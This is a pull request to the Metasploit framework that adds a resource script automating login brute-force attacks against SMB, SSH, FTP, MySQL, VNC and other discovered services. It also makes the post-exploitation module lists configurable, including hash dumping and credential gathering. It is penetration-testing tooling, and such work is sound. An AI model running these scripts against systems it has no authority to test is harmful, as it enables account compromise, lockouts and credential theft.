### PR TITLE
new auto_brute and fixed multi_post

### DIFF
--- a/scripts/resource/auto_brute.rc
+++ b/scripts/resource/auto_brute.rc
@@ -1,0 +1,260 @@
+# auto_brute.rc
+# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
+
+# This Metasploit RC-File could be used to automate the bruteforce process
+# the services are used from the already discovered service details of the database
+# for this we need the service names in the db!
+# VERBOSE is used from the global datastore
+# THREADS is used from the global datastore
+# USER_FILE and PASS_File is used from the global datastore
+
+# WARNING: You could lock out users with this resource script!
+
+<ruby>
+maxjobs = 8			#throttling if we get too much jobs
+
+wordlistpath = "#{Msf::Config.install_root}/data/wordlists"
+
+if (framework.datastore['USER_FILE'] == nil)
+	run_single("setg USER_FILE #{wordlistpath}/unix_users.txt")	# we are using the default unix wordlists
+end
+
+if (framework.datastore['PASS_FILE'] == nil)	
+	run_single("setg PASS_FILE #{wordlistpath}/unix_passwords.txt")	# we are using the default unix wordlists
+end
+
+if (framework.datastore['THREADS'] == nil)
+	run_single("setg THREADS 10")		#default to 10 Threads
+end
+
+if (framework.datastore['VERBOSE'] == "true")	#we look in the global datastore for a global VERBOSE option and use it
+	verbose = 1 #true
+else
+	verbose = 0
+end
+
+def jobwaiting(maxjobs,verbose)	#thread handling for poor guys
+	while(framework.jobs.keys.length >= maxjobs)
+		::IO.select(nil, nil, nil, 2.5)
+		if(verbose == 1)
+			print_error("waiting for finishing some modules... active jobs: #{framework.jobs.keys.length} / threads: #{framework.threads.length}")
+		end
+	end
+end
+
+def infos(serv,host)
+	print_line("")
+	print_line("====================================")
+	print_line("IP: #{host.address}")
+	print_line("OS: #{host.os_name}")
+	print_line("Servicename: #{serv.name}")
+	print_line("Service Port: #{serv.port.to_i}")
+	print_line("Service Protocol: #{serv.proto}")
+	print_line("====================================")
+	print_line("")
+end
+
+framework.db.hosts.each do |host|
+	host.services.each do |serv|
+		next if not serv.host
+		next if (serv.state != ServiceState::Open)
+		
+		# for now we only brute force these services, you can add some more ...
+		next if not (serv.name =~ /smb/ or 
+		             serv.name =~ /microsoft-ds/ or 
+		             serv.name =~ /netbios-ssn/ or 
+		             serv.name =~ /ftp/ or 
+		             serv.name =~ /ssh/ or 
+		             serv.name =~ /telnet/ or 
+		             serv.name =~ /mysql/ or 
+		             serv.name =~ /vnc/ or 
+		             serv.name =~ /mssql/ or 
+		             serv.name =~ /pop3/ or 
+		             serv.name =~ /postgres/)
+
+		xport = serv.port.to_i
+		xprot = serv.proto
+		xname = serv.name
+		oname = host.os_name
+		xhost = host.address
+
+		if(xname =~ /smb/ or xname =~ /microsoft-ds/ or xname =~ /netbios-ssn/) 
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			
+			print_line("smb_login")
+			run_single("use auxiliary/scanner/smb/smb_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /ftp/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("ftp_anonymous")
+			run_single("use auxiliary/scanner/ftp/anonymous")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			print_line("ftp_login")
+			run_single("use auxiliary/scanner/ftp/ftp_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /ssh/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("ssh_login")
+			run_single("use auxiliary/scanner/ssh/ssh_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /telnet/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("telnet_login")
+			run_single("use auxiliary/scanner/telnet/telnet_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end		
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /mysql/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("mysql_login")
+			run_single("use auxiliary/scanner/mysql/mysql_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /vnc/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("vnc_login")
+			run_single("use auxiliary/scanner/vnc/vnc_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			run_single("unsetg USER_FILE")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /mssql/ or xname =~ /ms-sql/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("mssql_login")
+			run_single("use auxiliary/scanner/mssql/mssql_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			run_single("unsetg USER_FILE")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /pop3/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("pop3_login")
+			run_single("use auxiliary/scanner/pop3/pop3_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			run_single("unsetg USER_FILE")
+			run_single("unsetg PASS_FILE")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+			
+		elsif(xname =~ /postgres/)
+			if(verbose == 1)
+				infos(serv,host)
+			end
+			print_line("postgres_login")
+			run_single("use auxiliary/scanner/postgres/postgres_login")
+			run_single("set RHOSTS #{xhost}")
+			run_single("set RPORT #{xport}")
+			run_single("unsetg USER_FILE")
+			run_single("unsetg PASS_FILE")
+			if(verbose == 1)
+				run_single("set VERBOSE true")
+				run_single("run -j")
+			else
+				run_single("run -j -q")
+			end
+			run_single("back")
+			jobwaiting(maxjobs,verbose)
+		else
+			print_error("no supported service found")
+		end
+	end #host.services.each loop
+end #framework.db.hosts.each loop
+</ruby>
+jobs
+
+

--- a/scripts/resource/multi_post.rc
+++ b/scripts/resource/multi_post.rc
@@ -13,50 +13,70 @@ else
 	verbose = 0
 end
 
-meterpreter_commands = [
-	'sysinfo',
-	'getuid',
-	'getpid',
-	'ps',
-	'ipconfig'
-]
+meterpreter_commands = Array.new
 
-modules_win = [
-	'post/windows/gather/hashdump',
-	'post/windows/gather/cachedump',
-	'post/windows/gather/smart_hashdump',
-	'post/windows/gather/enum_tokens',
-	'post/windows/gather/enum_domain',
-	'post/windows/gather/enum_domain_group_users',
-	'post/windows/gather/enum_domain_tokens',
-	'post/windows/gather/enum_hostfile',
-	'post/windows/gather/enum_ie',
-	'post/windows/gather/enum_logged_on_users',
-	'post/windows/gather/enum_ms_product_keys',
-	'post/windows/gather/credentials/vnc',
-	'post/windows/gather/credentials/windows_autologin',
-	'post/windows/gather/checkvm',
-	'post/windows/gather/enum_applications',
-	'post/windows/gather/enum_services',
-	'post/windows/gather/enum_shares',
-	'post/windows/gather/enum_snmp',
-	'post/windows/gather/enum_devices',
-	'post/windows/gather/enum_powershell_env'
-]	# add some more modules or comment some out ...
-modules_lin = [
-	'post/linux/gather/hashdump',
-	'post/osx/gather/hashdump',
-	'post/linux/gather/checkvm',
-	'post/linux/gather/enum_cron',
-	'post/linux/gather/enum_linux',
-	'post/linux/gather/enum_packages',
-	'post/linux/gather/enum_services',
-	'post/osx/gather/enum_osx'
-]
-modules_multi = [
-	'post/multi/gather/env',
-	'post/multi/gather/ssh_creds'
-]
+if (framework.datastore['METER_AUTO_COM'] != nil)	#we look in the global datastore for a global METER_AUTO_COM option and use it
+	meterpreter_commands = framework.datastore['METER_AUTO_COM'].split(" ")
+else
+	meterpreter_commands = [
+		'sysinfo',
+		'getuid',
+		'getpid',
+		'ps',
+		'ipconfig'
+	]
+end
+
+if (framework.datastore['MOD_WIN'] != nil)	#we look in the global datastore for a global METER_AUTO_COM option and use it
+	modules_win = framework.datastore['MOD_WIN'].split(" ")
+else
+	modules_win = [
+		'post/windows/gather/hashdump',
+		'post/windows/gather/cachedump',
+		'post/windows/gather/smart_hashdump',
+		'post/windows/gather/enum_tokens',
+		'post/windows/gather/enum_domain',
+		'post/windows/gather/enum_domain_group_users',
+		'post/windows/gather/enum_domain_tokens',
+		'post/windows/gather/enum_hostfile',
+		'post/windows/gather/enum_ie',
+		'post/windows/gather/enum_logged_on_users',
+		'post/windows/gather/enum_ms_product_keys',
+		'post/windows/gather/credentials/vnc',
+		'post/windows/gather/credentials/windows_autologin',
+		'post/windows/gather/checkvm',
+		'post/windows/gather/enum_applications',
+		'post/windows/gather/enum_services',
+		'post/windows/gather/enum_shares',
+		'post/windows/gather/enum_snmp',
+		'post/windows/gather/enum_devices',
+		'post/windows/gather/enum_powershell_env'
+	]	# add some more modules or comment some out ...
+end
+
+if (framework.datastore['MOD_LIN'] != nil)	#we look in the global datastore for a global METER_AUTO_COM option and use it
+	modules_lin = framework.datastore['MOD_LIN'].split(" ")
+else
+	modules_lin = [
+		'post/linux/gather/hashdump',
+		'post/osx/gather/hashdump',
+		'post/linux/gather/checkvm',
+		'post/linux/gather/enum_cron',
+		'post/linux/gather/enum_linux',
+		'post/linux/gather/enum_packages',
+		'post/linux/gather/enum_services',
+		'post/osx/gather/enum_osx'
+	]
+end
+
+if (framework.datastore['MOD_MULTI'] != nil)	#we look in the global datastore for a global METER_AUTO_COM option and use it
+	modules_multi = framework.datastore['MOD_MULTI'].split(" ")
+else
+	modules_multi = [
+		'post/multi/gather/env',
+		'post/multi/gather/ssh_creds'
+	]
+end
 
 if (framework.sessions.length > 0)		# lets start if we have a session
 	print_status("starting with post exploitation stuff")


### PR DESCRIPTION
Hey guys,

 a new resource script for automating the brute force task and I have added a possibility for configuring the post modules of the multi_post.rc (discussed with wchen-r7 in pull request 158)

setg
  METER_AUTO_COM   sysinfo ipconfig getuid
  MOD_WIN          post/windows/gather/hashdump post/windows/gather/enum_ms_product_keys
  MOD_LIN
  MOD_MULTI

For now use a space between the commands and the post modules. With this the user is able to configure the post modules that should be used. If there is no global config the backup config (hard coded) will be used.

Best,
mIke
